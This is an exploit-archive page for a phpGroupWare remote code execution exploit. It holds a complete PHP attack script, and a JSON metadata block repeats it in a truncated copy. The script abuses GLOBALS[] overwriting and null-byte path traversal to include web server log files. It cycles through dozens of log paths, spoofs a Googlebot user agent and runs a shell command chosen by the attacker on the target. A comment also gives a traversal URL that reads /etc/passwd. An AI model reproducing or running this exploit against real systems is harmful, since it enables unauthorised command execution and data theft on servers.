Search...

phpGroupWare <= 0.9.16.010 GLOBALS[] Remote Code Execution Exploit

2006-08-29T00:00:00

ID 1337DAY-ID-756
Type zdt
Reporter Kacper
Modified 2006-08-29T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==================================================================
phpGroupWare &lt;= 0.9.16.010 GLOBALS[] Remote Code Execution Exploit
==================================================================


#!/usr/bin/php -q -d short_open_tag=on
&lt;?
/*
this works against register_globals=On
and magic quotes = off :) 
*/
/*
vulnerable code =&gt; calendar/inc/class.holidaycalc.inc.php line 14-33:
....
  /* $Id: class.holidaycalc.inc.php,v 1.5 2001/08/26 12:32:28 skeeter Exp $ */

	if (empty($GLOBALS['phpgw_info']['user']['preferences']['common']['country']))
	{
		$rule = 'US';
	}
	else
	{
		$rule = $GLOBALS['phpgw_info']['user']['preferences']['common']['country'];
	}

	$calc_include = PHPGW_INCLUDE_ROOT.'/calendar/inc/class.holidaycalc_'.$rule.'.inc.php';
	if(@file_exists($calc_include))
	{
		include($calc_include);
	}
	else
	{
		include(PHPGW_INCLUDE_ROOT.'/calendar/inc/class.holidaycalc_US.inc.php');
	}
....

ex: 
http://www.site.com/[phpGroupWare_path]/calendar/inc/class.holidaycalc.inc.php?GLOBALS[phpgw_info][user][preferences][common][country]=../../../../../../../../../etc/passwd%00
*/

echo "+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~";
echo "+\r\n";
echo "-   - - [DEVIL TEAM THE BEST POLISH TEAM] - -\r\n\r\n";
echo "+\r\n";
echo "+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\"\r\n";
echo "+\r\n\r\n";
echo "- phpGroupWare &lt;= 0.9.16.010 GLOBALS[] Remote Code Execution Exploit"\r\n";
echo "+"\r\n";
echo "+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"\r\n";
echo "+"\r\n";
echo "- [Script name: phpGroupWare v. 0.9.16.010"\r\n";
echo "- [Script site: http://sourceforge.net/projects/phpgroupware/"\r\n";
echo "+"\r\n";
echo "+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"\r\n";
echo "+"\r\n";
echo "-          Find by: Kacper (a.k.a Rahim)"\r\n";
echo "+"\r\n";
echo "+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\"\r\n";
echo "+"\r\n";
echo "- Special Greetz: DragonHeart ;-)"\r\n";
echo "- Ema: Leito, Adam, DeathSpeed, Drzewko, pepi, nukedclx, mivus ;]"\r\n";
echo "+"\r\n";
echo "[email protected] Przyjazni nie da sie zamienic na marne korzysci @!"\r\n";
echo "+"\r\n";
echo "+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\"\r\n";
echo "+"\r\n";
echo "-            Z Dedykacja dla osoby,"\r\n";
echo "-         bez ktorej nie mogl bym zyc..."\r\n";
echo "-           K.C:* J.M (a.k.a Magaja)"\r\n";
echo "+"\r\n";
echo "+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\"\r\n";
if ($argc&lt;4) {
echo "Usage: php ".$argv[0]." host path cmd options\r\n";
echo "host:      target server (ip/hostname)\r\n";
echo "path:      path to PHPList\r\n";
echo "cmd:       a shell command\r\n";
echo "Options:\r\n";
echo "   -p[port]:    specify a port other than 80\r\n";
echo "   -P[ip:port]: specify a proxy\r\n";
echo "Examples:\r\n";
echo "php ".$argv[0]." localhost /lists/ cat ./config/config.php\r\n";
echo "php ".$argv[0]." localhost /lists/ ls -la -p81\r\n";
echo "php ".$argv[0]." localhost / ls -la -P1.1.1.1:80\r\n";
die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i&lt;=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) &lt;= 32 ) | (ord($string[$i]) &gt; 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
 return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
	$c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
	}
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
  #debug
  #echo "\r\n".$html;
}
function make_seed()
{
   list($usec, $sec) = explode(' ', microtime());
   return (float) $sec + ((float) $usec * 100000);
}

$host=$argv[1];
$path=$argv[2];
$cmd="";$port=80;$proxy="";

for ($i=3; $i&lt;=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp&lt;&gt;"-p") and ($temp&lt;&gt;"-P"))
{$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
  $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
}
$cmd=urlencode($cmd);
if (($path[0]&lt;&gt;'/') or ($path[strlen($path)-1]&lt;&gt;'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

$paths=array(
"../../../../../../../../../../../../var/log/httpd/access_log",
"../../../../../../../../../../../../var/log/httpd/error_log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../../../../../../apache/logs/error.log",
"../../../../../../apache/logs/access.log",
"../../../../../../../apache/logs/error.log",
"../../../../../../../apache/logs/access.log",
"../../../../../../../../apache/logs/error.log",
"../../../../../../../../apache/logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../../logs/error.log",
"../../../../../../logs/access.log",
"../../../../../../../logs/error.log",
"../../../../../../../logs/access.log",
"../../../../../../../../logs/error.log",
"../../../../../../../../logs/access.log",
"../../../../../../../../../../../../etc/httpd/logs/acces_log",
"../../../../../../../../../../../../etc/httpd/logs/acces.log",
"../../../../../../../../../../../../etc/httpd/logs/error_log",
"../../../../../../../../../../../../etc/httpd/logs/error.log",
"../../../../../../../../../../../../var/www/logs/access_log",
"../../../../../../../../../../../../var/www/logs/access.log",
"../../../../../../../../../../../../usr/local/apache/logs/access_log",
"../../../../../../../../../../../../usr/local/apache/logs/access.log",
"../../../../../../../../../../../../var/log/apache/access_log",
"../../../../../../../../../../../../var/log/apache/access.log",
"../../../../../../../../../../../../var/log/access_log",
"../../../../../../../../../../../../var/www/logs/error_log",
"../../../../../../../../../../../../var/www/logs/error.log",
"../../../../../../../../../../../../usr/local/apache/logs/error_log",
"../../../../../../../../../../../../usr/local/apache/logs/error.log",
"../../../../../../../../../../../../var/log/apache/error_log",
"../../../../../../../../../../../../var/log/apache/error.log",
"../../../../../../../../../../../../var/log/access_log",
"../../../../../../../../../../../../var/log/error_log"
);
for ($i=0; $i&lt;=count($paths)-1; $i++)
{
$a=$i+2;
echo "[".$a."] PATH: ".$paths[$i]."\r\n";
$packet ="GET ".$p."calendar/inc/class.holidaycalc.inc.php?GLOBALS[phpgw_info][user][preferences][common][country]=".$paths[$i]."%00&cmd=".$cmd." HTTP/1.0\r\n";
$packet.="User-Agent: Googlebot/2.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (strstr($html,"56789"))
{
 $temp=explode("56789",$html);
 echo $temp[1];
 echo "\r\nExploit succeeded...\r\n";
 die;
}
}
?&gt;




#  0day.today [2018-04-10]  #

JSON Vulners Source

Initial Source

{"hash": "de4f47f5f1463d1eaeadff9f1f53881925970391b4e4b28b098e51530cd5ba17", "id": "1337DAY-ID-756", "lastseen": "2018-04-10T09:48:46", "viewCount": 0, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "2481b82eee1cd770af695d842a5b9c42", "key": "href"}, {"hash": "ed8fbd75dec171180f55871203de5cfc", "key": "modified"}, {"hash": "ed8fbd75dec171180f55871203de5cfc", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "507e633ae4aac6c606627393ea66a0e6", "key": "reporter"}, {"hash": "7a8c123dd752096ac3e049950ffdf4b1", "key": "sourceData"}, {"hash": "007071951d3dcffc6a6a77e5953a8606", "key": "sourceHref"}, {"hash": "40d8c79591961575af13e87c587731e0", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"vulnersScore": 7.5}, "type": "zdt", "sourceHref": "https://0day.today/exploit/756", "description": "Exploit for unknown platform in category web applications", "title": "phpGroupWare <= 0.9.16.010 GLOBALS[] Remote Code Execution Exploit", "history": [{"bulletin": {"hash": "15664d5a65399a5f6e35642541377a809bb0067376802137277b5b9aa6b0fd91", "id": "1337DAY-ID-756", "lastseen": "2016-04-20T02:05:34", "enchantments": {"score": {"value": 4.7, "vector": "AV:N/AC:L/Au:M/C:P/I:N/A:P/", "modified": "2016-04-20T02:05:34"}}, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "ed8fbd75dec171180f55871203de5cfc", "key": "modified"}, {"hash": "ed7a7672aef86d1ecf7c981a9bcc004c", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "40d8c79591961575af13e87c587731e0", "key": "title"}, {"hash": "507e633ae4aac6c606627393ea66a0e6", "key": "reporter"}, {"hash": "4380007de4f038d16428c03934763bb2", "key": "sourceData"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "ed8fbd75dec171180f55871203de5cfc", "key": "published"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "f73381f8fb678b2d9bd18409a04322a8", "key": "sourceHref"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/756", "description": "Exploit for unknown platform in category web applications", "viewCount": 0, "title": "phpGroupWare <= 0.9.16.010 GLOBALS[] Remote Code Execution Exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "==================================================================\r\nphpGroupWare <= 0.9.16.010 GLOBALS[] Remote Code Execution Exploit\r\n==================================================================\r\n\r\n\r\n#!/usr/bin/php -q -d short_open_tag=on\r\n<?\r\n/*\r\nthis works against register_globals=On\r\nand magic quotes = off :) \r\n*/\r\n/*\r\nvulnerable code => calendar/inc/class.holidaycalc.inc.php line 14-33:\r\n....\r\n /* $Id: class.holidaycalc.inc.php,v 1.5 2001/08/26 12:32:28 skeeter Exp $ */\r\n\r\n\tif (empty($GLOBALS['phpgw_info']['user']['preferences']['common']['country']))\r\n\t{\r\n\t\t$rule = 'US';\r\n\t}\r\n\telse\r\n\t{\r\n\t\t$rule = $GLOBALS['phpgw_info']['user']['preferences']['common']['country'];\r\n\t}\r\n\r\n\t$calc_include = PHPGW_INCLUDE_ROOT.'/calendar/inc/class.holidaycalc_'.$rule.'.inc.php';\r\n\tif(@file_exists($calc_include))\r\n\t{\r\n\t\tinclude($calc_include);\r\n\t}\r\n\telse\r\n\t{\r\n\t\tinclude(PHPGW_INCLUDE_ROOT.'/calendar/inc/class.holidaycalc_US.inc.php');\r\n\t}\r\n....\r\n\r\nex: \r\nhttp://www.site.com/[phpGroupWare_path]/calendar/inc/class.holidaycalc.inc.php?GLOBALS[phpgw_info][user][preferences][common][country]=../../../../../../../../../etc/passwd%00\r\n*/\r\n\r\necho \"+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\";\r\necho \"+\\r\\n\";\r\necho \"- - - [DEVIL TEAM THE BEST POLISH TEAM] - -\\r\\n\\r\\n\";\r\necho \"+\\r\\n\";\r\necho \"+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\\"\\r\\n\";\r\necho \"+\\r\\n\\r\\n\";\r\necho \"- phpGroupWare <= 0.9.16.010 GLOBALS[] Remote Code Execution Exploit\"\\r\\n\";\r\necho \"+\"\\r\\n\";\r\necho \"+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\"\\r\\n\";\r\necho \"+\"\\r\\n\";\r\necho \"- [Script name: phpGroupWare v. 0.9.16.010\"\\r\\n\";\r\necho \"- [Script site: http://sourceforge.net/projects/phpgroupware/\"\\r\\n\";\r\necho \"+\"\\r\\n\";\r\necho \"+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\"\\r\\n\";\r\necho \"+\"\\r\\n\";\r\necho \"- Find by: Kacper (a.k.a Rahim)\"\\r\\n\";\r\necho \"+\"\\r\\n\";\r\necho \"+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\\"\\r\\n\";\r\necho \"+\"\\r\\n\";\r\necho \"- Special Greetz: DragonHeart ;-)\"\\r\\n\";\r\necho \"- Ema: Leito, Adam, DeathSpeed, Drzewko, pepi, nukedclx, mivus ;]\"\\r\\n\";\r\necho \"+\"\\r\\n\";\r\necho \"!@ Przyjazni nie da sie zamienic na marne korzysci @!\"\\r\\n\";\r\necho \"+\"\\r\\n\";\r\necho \"+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\\"\\r\\n\";\r\necho \"+\"\\r\\n\";\r\necho \"- Z Dedykacja dla osoby,\"\\r\\n\";\r\necho \"- bez ktorej nie mogl bym zyc...\"\\r\\n\";\r\necho \"- K.C:* J.M (a.k.a Magaja)\"\\r\\n\";\r\necho \"+\"\\r\\n\";\r\necho \"+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\\"\\r\\n\";\r\nif ($argc<4) {\r\necho \"Usage: php \".$argv[0].\" host path cmd options\\r\\n\";\r\necho \"host: target server (ip/hostname)\\r\\n\";\r\necho \"path: path to PHPList\\r\\n\";\r\necho \"cmd: a shell command\\r\\n\";\r\necho \"Options:\\r\\n\";\r\necho \" -p[port]: specify a port other than 80\\r\\n\";\r\necho \" -P[ip:port]: specify a proxy\\r\\n\";\r\necho \"Examples:\\r\\n\";\r\necho \"php \".$argv[0].\" localhost /lists/ cat ./config/config.php\\r\\n\";\r\necho \"php \".$argv[0].\" localhost /lists/ ls -la -p81\\r\\n\";\r\necho \"php \".$argv[0].\" localhost / ls -la -P1.1.1.1:80\\r\\n\";\r\ndie;\r\n}\r\nerror_reporting(0);\r\nini_set(\"max_execution_time\",0);\r\nini_set(\"default_socket_timeout\",5);\r\nfunction quick_dump($string)\r\n{\r\n $result='';$exa='';$cont=0;\r\n for ($i=0; $i<=strlen($string)-1; $i++)\r\n {\r\n if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))\r\n {$result.=\" .\";}\r\n else\r\n {$result.=\" \".$string[$i];}\r\n if (strlen(dechex(ord($string[$i])))==2)\r\n {$exa.=\" \".dechex(ord($string[$i]));}\r\n else\r\n {$exa.=\" 0\".dechex(ord($string[$i]));}\r\n $cont++;if ($cont==15) {$cont=0; $result.=\"\\r\\n\"; $exa.=\"\\r\\n\";}\r\n }\r\n return $exa.\"\\r\\n\".$result;\r\n}\r\n$proxy_regex = '(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:\\d{1,5}\\b)';\r\nfunction sendpacketii($packet)\r\n{\r\n global $proxy, $host, $port, $html, $proxy_regex;\r\n if ($proxy=='') {\r\n $ock=fsockopen(gethostbyname($host),$port);\r\n if (!$ock) {\r\n echo 'No response from '.$host.':'.$port; die;\r\n }\r\n }\r\n else {\r\n\t$c = preg_match($proxy_regex,$proxy);\r\n if (!$c) {\r\n echo 'Not a valid proxy...';die;\r\n }\r\n $parts=explode(':',$proxy);\r\n echo \"Connecting to \".$parts[0].\":\".$parts[1].\" proxy...\\r\\n\";\r\n $ock=fsockopen($parts[0],$parts[1]);\r\n if (!$ock) {\r\n echo 'No response from proxy...';die;\r\n\t}\r\n }\r\n fputs($ock,$packet);\r\n if ($proxy=='') {\r\n $html='';\r\n while (!feof($ock)) {\r\n $html.=fgets($ock);\r\n }\r\n }\r\n else {\r\n $html='';\r\n while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {\r\n $html.=fread($ock,1);\r\n }\r\n }\r\n fclose($ock);\r\n #debug\r\n #echo \"\\r\\n\".$html;\r\n}\r\nfunction make_seed()\r\n{\r\n list($usec, $sec) = explode(' ', microtime());\r\n return (float) $sec + ((float) $usec * 100000);\r\n}\r\n\r\n$host=$argv[1];\r\n$path=$argv[2];\r\n$cmd=\"\";$port=80;$proxy=\"\";\r\n\r\nfor ($i=3; $i<=$argc-1; $i++){\r\n$temp=$argv[$i][0].$argv[$i][1];\r\nif (($temp<>\"-p\") and ($temp<>\"-P\"))\r\n{$cmd.=\" \".$argv[$i];}\r\nif ($temp==\"-p\")\r\n{\r\n $port=str_replace(\"-p\",\"\",$argv[$i]);\r\n}\r\nif ($temp==\"-P\")\r\n{\r\n $proxy=str_replace(\"-P\",\"\",$argv[$i]);\r\n}\r\n}\r\n$cmd=urlencode($cmd);\r\nif (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}\r\nif ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}\r\n\r\n$paths=array(\r\n\"../../../../../../../../../../../../var/log/httpd/access_log\",\r\n\"../../../../../../../../../../../../var/log/httpd/error_log\",\r\n\"../../../apache/logs/error.log\",\r\n\"../../../apache/logs/access.log\",\r\n\"../../../../apache/logs/error.log\",\r\n\"../../../../apache/logs/access.log\",\r\n\"../../../../../apache/logs/error.log\",\r\n\"../../../../../apache/logs/access.log\",\r\n\"../../../../../../apache/logs/error.log\",\r\n\"../../../../../../apache/logs/access.log\",\r\n\"../../../../../../../apache/logs/error.log\",\r\n\"../../../../../../../apache/logs/access.log\",\r\n\"../../../../../../../../apache/logs/error.log\",\r\n\"../../../../../../../../apache/logs/access.log\",\r\n\"../../../logs/error.log\",\r\n\"../../../logs/access.log\",\r\n\"../../../../logs/error.log\",\r\n\"../../../../logs/access.log\",\r\n\"../../../../../logs/error.log\",\r\n\"../../../../../logs/access.log\",\r\n\"../../../../../../logs/error.log\",\r\n\"../../../../../../logs/access.log\",\r\n\"../../../../../../../logs/error.log\",\r\n\"../../../../../../../logs/access.log\",\r\n\"../../../../../../../../logs/error.log\",\r\n\"../../../../../../../../logs/access.log\",\r\n\"../../../../../../../../../../../../etc/httpd/logs/acces_log\",\r\n\"../../../../../../../../../../../../etc/httpd/logs/acces.log\",\r\n\"../../../../../../../../../../../../etc/httpd/logs/error_log\",\r\n\"../../../../../../../../../../../../etc/httpd/logs/error.log\",\r\n\"../../../../../../../../../../../../var/www/logs/access_log\",\r\n\"../../../../../../../../../../../../var/www/logs/access.log\",\r\n\"../../../../../../../../../../../../usr/local/apache/logs/access_log\",\r\n\"../../../../../../../../../../../../usr/local/apache/logs/access.log\",\r\n\"../../../../../../../../../../../../var/log/apache/access_log\",\r\n\"../../../../../../../../../../../../var/log/apache/access.log\",\r\n\"../../../../../../../../../../../../var/log/access_log\",\r\n\"../../../../../../../../../../../../var/www/logs/error_log\",\r\n\"../../../../../../../../../../../../var/www/logs/error.log\",\r\n\"../../../../../../../../../../../../usr/local/apache/logs/error_log\",\r\n\"../../../../../../../../../../../../usr/local/apache/logs/error.log\",\r\n\"../../../../../../../../../../../../var/log/apache/error_log\",\r\n\"../../../../../../../../../../../../var/log/apache/error.log\",\r\n\"../../../../../../../../../../../../var/log/access_log\",\r\n\"../../../../../../../../../../../../var/log/error_log\"\r\n);\r\nfor ($i=0; $i<=count($paths)-1; $i++)\r\n{\r\n$a=$i+2;\r\necho \"[\".$a.\"] PATH: \".$paths[$i].\"\\r\\n\";\r\n$packet =\"GET \".$p.\"calendar/inc/class.holidaycalc.inc.php?GLOBALS[phpgw_info][user][preferences][common][country]=\".$paths[$i].\"%00&cmd=\".$cmd.\" HTTP/1.0\\r\\n\";\r\n$packet.=\"User-Agent: Googlebot/2.1\\r\\n\";\r\n$packet.=\"Host: \".$host.\"\\r\\n\";\r\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\r\nsendpacketii($packet);\r\nif (strstr($html,\"56789\"))\r\n{\r\n $temp=explode(\"56789\",$html);\r\n echo $temp[1];\r\n echo \"\\r\\nExploit succeeded...\\r\\n\";\r\n die;\r\n}\r\n}\r\n?>\r\n\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "published": "2006-08-29T00:00:00", "references": [], "reporter": "Kacper", "modified": "2006-08-29T00:00:00", "href": "http://0day.today/exploit/description/756"}, "lastseen": "2016-04-20T02:05:34", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "==================================================================\r\nphpGroupWare <= 0.9.16.010 GLOBALS[] Remote Code Execution Exploit\r\n==================================================================\r\n\r\n\r\n#!/usr/bin/php -q -d short_open_tag=on\r\n<?\r\n/*\r\nthis works against register_globals=On\r\nand magic quotes = off :) \r\n*/\r\n/*\r\nvulnerable code => calendar/inc/class.holidaycalc.inc.php line 14-33:\r\n....\r\n /* $Id: class.holidaycalc.inc.php,v 1.5 2001/08/26 12:32:28 skeeter Exp $ */\r\n\r\n\tif (empty($GLOBALS['phpgw_info']['user']['preferences']['common']['country']))\r\n\t{\r\n\t\t$rule = 'US';\r\n\t}\r\n\telse\r\n\t{\r\n\t\t$rule = $GLOBALS['phpgw_info']['user']['preferences']['common']['country'];\r\n\t}\r\n\r\n\t$calc_include = PHPGW_INCLUDE_ROOT.'/calendar/inc/class.holidaycalc_'.$rule.'.inc.php';\r\n\tif(@file_exists($calc_include))\r\n\t{\r\n\t\tinclude($calc_include);\r\n\t}\r\n\telse\r\n\t{\r\n\t\tinclude(PHPGW_INCLUDE_ROOT.'/calendar/inc/class.holidaycalc_US.inc.php');\r\n\t}\r\n....\r\n\r\nex: \r\nhttp://www.site.com/[phpGroupWare_path]/calendar/inc/class.holidaycalc.inc.php?GLOBALS[phpgw_info][user][preferences][common][country]=../../../../../../../../../etc/passwd%00\r\n*/\r\n\r\necho \"+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\";\r\necho \"+\\r\\n\";\r\necho \"- - - [DEVIL TEAM THE BEST POLISH TEAM] - -\\r\\n\\r\\n\";\r\necho \"+\\r\\n\";\r\necho \"+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\\"\\r\\n\";\r\necho \"+\\r\\n\\r\\n\";\r\necho \"- phpGroupWare <= 0.9.16.010 GLOBALS[] Remote Code Execution Exploit\"\\r\\n\";\r\necho \"+\"\\r\\n\";\r\necho \"+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\"\\r\\n\";\r\necho \"+\"\\r\\n\";\r\necho \"- [Script name: phpGroupWare v. 0.9.16.010\"\\r\\n\";\r\necho \"- [Script site: http://sourceforge.net/projects/phpgroupware/\"\\r\\n\";\r\necho \"+\"\\r\\n\";\r\necho \"+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\"\\r\\n\";\r\necho \"+\"\\r\\n\";\r\necho \"- Find by: Kacper (a.k.a Rahim)\"\\r\\n\";\r\necho \"+\"\\r\\n\";\r\necho \"+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\\"\\r\\n\";\r\necho \"+\"\\r\\n\";\r\necho \"- Special Greetz: DragonHeart ;-)\"\\r\\n\";\r\necho \"- Ema: Leito, Adam, DeathSpeed, Drzewko, pepi, nukedclx, mivus ;]\"\\r\\n\";\r\necho \"+\"\\r\\n\";\r\necho \"[email\u00a0protected] Przyjazni nie da sie zamienic na marne korzysci @!\"\\r\\n\";\r\necho \"+\"\\r\\n\";\r\necho \"+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\\"\\r\\n\";\r\necho \"+\"\\r\\n\";\r\necho \"- Z Dedykacja dla osoby,\"\\r\\n\";\r\necho \"- bez ktorej nie mogl bym zyc...\"\\r\\n\";\r\necho \"- K.C:* J.M (a.k.a Magaja)\"\\r\\n\";\r\necho \"+\"\\r\\n\";\r\necho \"+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\\"\\r\\n\";\r\nif ($argc<4) {\r\necho \"Usage: php \".$argv[0].\" host path cmd options\\r\\n\";\r\necho \"host: target server (ip/hostname)\\r\\n\";\r\necho \"path: path to PHPList\\r\\n\";\r\necho \"cmd: a shell command\\r\\n\";\r\necho \"Options:\\r\\n\";\r\necho \" -p[port]: specify a port other than 80\\r\\n\";\r\necho \" -P[ip:port]: specify a proxy\\r\\n\";\r\necho \"Examples:\\r\\n\";\r\necho \"php \".$argv[0].\" localhost /lists/ cat ./config/config.php\\r\\n\";\r\necho \"php \".$argv[0].\" localhost /lists/ ls -la -p81\\r\\n\";\r\necho \"php \".$argv[0].\" localhost / ls -la -P1.1.1.1:80\\r\\n\";\r\ndie;\r\n}\r\nerror_reporting(0);\r\nini_set(\"max_execution_time\",0);\r\nini_set(\"default_socket_timeout\",5);\r\nfunction quick_dump($string)\r\n{\r\n $result='';$exa='';$cont=0;\r\n for ($i=0; $i<=strlen($string)-1; $i++)\r\n {\r\n if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))\r\n {$result.=\" .\";}\r\n else\r\n {$result.=\" \".$string[$i];}\r\n if (strlen(dechex(ord($string[$i])))==2)\r\n {$exa.=\" \".dechex(ord($string[$i]));}\r\n else\r\n {$exa.=\" 0\".dechex(ord($string[$i]));}\r\n $cont++;if ($cont==15) {$cont=0; $result.=\"\\r\\n\"; $exa.=\"\\r\\n\";}\r\n }\r\n return $exa.\"\\r\\n\".$result;\r\n}\r\n$proxy_regex = '(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:\\d{1,5}\\b)';\r\nfunction sendpacketii($packet)\r\n{\r\n global $proxy, $host, $port, $html, $proxy_regex;\r\n if ($proxy=='') {\r\n $ock=fsockopen(gethostbyname($host),$port);\r\n if (!$ock) {\r\n echo 'No response from '.$host.':'.$port; die;\r\n }\r\n }\r\n else {\r\n\t$c = preg_match($proxy_regex,$proxy);\r\n if (!$c) {\r\n echo 'Not a valid proxy...';die;\r\n }\r\n $parts=explode(':',$proxy);\r\n echo \"Connecting to \".$parts[0].\":\".$parts[1].\" proxy...\\r\\n\";\r\n $ock=fsockopen($parts[0],$parts[1]);\r\n if (!$ock) {\r\n echo 'No response from proxy...';die;\r\n\t}\r\n }\r\n fputs($ock,$packet);\r\n if ($proxy=='') {\r\n $html='';\r\n while (!feof($ock)) {\r\n $html.=fgets($ock);\r\n }\r\n }\r\n else {\r\n $html='';\r\n while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {\r\n $html.=fread($ock,1);\r\n }\r\n }\r\n fclose($ock);\r\n #debug\r\n #echo \"\\r\\n\".$html;\r\n}\r\nfunction make_seed()\r\n{\r\n list($usec, $sec) = explode(' ', microtime());\r\n return (float) $sec + ((float) $usec * 100000);\r\n}\r\n\r\n$host=$argv[1];\r\n$path=$argv[2];\r\n$cmd=\"\";$port=80;$proxy=\"\";\r\n\r\nfor ($i=3; $i<=$argc-1; $i++){\r\n$temp=$argv[$i][0].$argv[$i][1];\r\nif (($temp<>\"-p\") and ($temp<>\"-P\"))\r\n{$cmd.=\" \".$argv[$i];}\r\nif ($temp==\"-p\")\r\n{\r\n $port=str_replace(\"-p\",\"\",$argv[$i]);\r\n}\r\nif ($temp==\"-P\")\r\n{\r\n 